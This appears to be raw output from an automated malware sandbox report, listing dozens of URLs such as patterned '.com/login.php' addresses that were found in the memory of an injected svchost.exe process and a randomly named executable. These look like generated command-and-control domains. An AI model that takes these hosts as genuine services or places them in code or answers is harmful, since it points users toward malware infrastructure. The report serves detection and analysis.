Source: svchost.exe, 00000002.00000003.1501618192.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1702355410.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1711907800.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710889329.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qetylyv.com/login.php
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534594675.0000000002F1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742183929.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1768332596.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533888500.0000000008AFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qetynev.com/login.php
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104244256.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051969437.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2048442631.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qetynup.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2623952843.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2142459408.0000000002F1D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2143261512.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615554415.0000000002F1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qetyraq.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qetysog.com/login.php
Source: svchost.exe, 00000002.00000003.1411284154.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1389905582.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1402185075.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1411345133.0000000002F34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1401679434.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.2052149448.0000000008E50000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.2052149448.0000000008EEC000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.1841991306.0000000001574000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.2054776037.00000000093A0000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2106422115.000000000A5ED000.00000004.00000010.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.1859768092.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1795928621.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1919088226.0000000008414000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1819927657.000000000330D000.00000004.00000010.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000013.00000002.1934543116.00000000089D0000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.1826196829.0000000000CCD000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.2033815046.00000000087F6000.00000004.00000001.00020000.00000000.sdmp, 
Source: svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722529774.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724383433.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojyrak.com/login.php
Source: svchost.exe, 00000002.00000003.1930409487.0000000008AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojyrum.com/http://vojyrum.com/
Source: svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722529774.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1516145875.0000000002FAC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724383433.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1514765633.0000000008B09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojyzyt.com/login.php
Source: svchost.exe, 00000002.00000002.2604355342.0000000000812000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2616565446.0000000002F67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volybak.com/login.php
Source: svchost.exe, 00000002.00000002.2604355342.0000000000812000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volybak.com/login.php?
Source: svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722529774.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724383433.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volycik.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volygyt.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyjif.com/login.php
Source: svchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volymum.com/
Source: svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722340000.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1516145875.0000000002FAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volypum.com/login.php
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AA8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AA8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyrac.com/
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyrut.com/login.php
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576914176.0000000008BFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576643702.0000000008BFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1577232502.0000000008BFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2048442631.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyzic.com/login.php
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533903269.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonycum.com/login.php
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051969437.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2048442631.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1577305596.0000000008B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonydem.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2623952843.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyjuc.com/login.php
Source: svchost.exe, 00000002.00000003.1487581864.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1711907800.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1486308101.0000000002FC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyket.com/login.php
Source: svchost.exe, 00000002.00000003.1820476887.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1825691340.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1821880893.000000000089D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonykuk.com/login.php
Source: svchost.exe, 00000002.00000003.1411284154.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1402185075.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433691652.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1411345133.0000000002F34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1401679434.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.1841589649.0000000001139000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.2052149448.0000000008EEC000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.2054776037.0000000009478000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.1841991306.00000000014CF000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.1841991306.0000000001574000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.2054776037.00000000093A0000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.1841991306.0000000001507000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.1859768092.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2111997635.000000000AFED000.00000004.00000010.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2073814977.000000000936A000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1795928621.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1919088226.0000000008414000.00000004.00000001.00020000.00000000.sdmp, 
ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1795928621.0000000000838000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1795928621.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000013.00000002.1804176921.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000013.00000002.1804176921.0000000000A5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonypom.com/login.php
Source: svchost.exe, 00000002.00000003.1613895496.0000000002FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonypom.com/login.phpQQC:
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1598705927.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyqof.com/login.php
Source: svchost.exe, 00000002.00000003.1501618192.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1702355410.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1711907800.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710889329.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1487225312.0000000008B16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyqok.com/login.php
Source: svchost.exe, 00000002.00000003.1800870882.0000000008AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyqym.com/
Source: svchost.exe, 00000002.00000003.1820476887.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559578676.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1569151955.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559905278.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1800870882.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1825691340.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1821880893.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1547357675.0000000002F1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyqym.com/login.php
Source: svchost.exe, 00000002.00000003.1545295076.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1544887919.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1540976483.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1540212609.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1547357675.0000000002F1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyrot.com/login.php
Source: svchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664665430.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1471391644.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1661335994.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433247007.0000000008B0A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664583329.0000000008A14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyryc.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2616565446.0000000002F67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyryk.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937479340.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911552556.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1830571345.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1861091241.0000000008B72000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1537002580.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1537114669.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1541111561.0000000008A25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1768332596.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881038659.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1918717004.0000000008B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyzac.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1592136244.0000000002F1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyzut.com/login.php
Source: svchost.exe, 00000002.00000003.1389634570.0000000008AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopybyt.com/http://pujyjav.com/8X
Source: svchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1613886596.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632803453.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1401679434.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.2052149448.0000000008E50000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.2052149448.0000000008EEC000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.1841589649.000000000110F000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.1841991306.0000000001574000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.2054776037.00000000093E3000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.1859768092.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2073814977.000000000936A000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1795928621.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1919088226.0000000008414000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000013.00000002.1804176921.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000013.00000002.1934543116.00000000089D0000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.1826196829.0000000000CCD000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.2033815046.00000000087F6000.00000004.00000001.00020000.00000000.sdmp, 
ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000002.1833090885.0000000001346000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000002.1833090885.0000000001375000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000002.2055807285.0000000009187000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001A.00000002.2096441666.0000000008515000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://vopybyt.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopycoc.com/login.php
Source: svchost.exe, 00000002.00000003.1545295076.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1544887919.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1542434740.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1539305897.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopycyf.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1592136244.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopydaf.com/login.php
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1545631030.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1537002580.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533884636.0000000002F7A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742183929.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1539305897.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopygat.com/login.php
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopymit.com/login.php
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534594675.0000000002F1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742183929.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533888500.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1547357675.0000000002F1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopymyc.com/login.php
Source: svchost.exe, 00000002.00000003.1556061520.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1830571345.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1800870882.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopypec.com/login.php
Source: svchost.exe, 00000002.00000003.2101253018.0000000002FA9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2617205537.0000000002FAC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1859997516.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710580103.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1613895496.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2088274615.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2616565446.0000000002F67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2101914674.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724217882.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2033340194.0000000002FA9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1598016540.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1598705927.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801191951.0000000002FA9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1598041021.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095869599.0000000002FAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyput.com/login.php
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1569151955.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyqef.com/http://lykyxoj.com/http://qebyfup.com/http://pumybuq.com/H
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1615937487.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617654306.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyrem.com/login.php
Source: svchost.exe, 00000002.00000003.1556061520.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1828997616.0000000008A14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyzot.com/
